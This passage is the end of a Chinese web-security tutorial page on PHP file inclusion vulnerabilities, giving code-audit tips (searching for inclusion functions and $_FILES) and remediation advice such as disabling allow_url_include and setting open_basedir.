</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>代码审计的时候全局搜索以上函数</p> <p>如果是基于图像上传的 ，要搜<code>$_FILES</code> 变量， 因为PHP处理上传文件的功能，基本都与$_FILES有关。</p> <p>查看目录结构，重点关注includes、modules等文件夹，查看index.php等文件是否<strong>动态调用</strong>过这些内容，变量是否可控。</p> <h2 id="修复建议">修复建议 <a href="#修复建议" class="header-anchor">#</a></h2> <blockquote><ol><li>禁止远程文件包含 <code>allow_url_include=off</code></li> <li>配置 <code>open_basedir=指定目录</code>，限制访问区域。</li> <li>过滤<code>../</code>等特殊符号</li> <li>修改Apache日志文件的存放地址</li> <li>开启魔术引号 <code>magic_quotes_qpc=on</code></li> <li>尽量不要使用动态变量调用文件，直接写要包含的文件。</li></ol></blockquote></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/web/fileuploads.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        文件上传漏洞
      </a></span> <span class="next"><a href="/knowledge/web/cmd_injection.html">
        命令注入漏洞
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/74.3612ba47.js" defer></script>
  </body>
</html>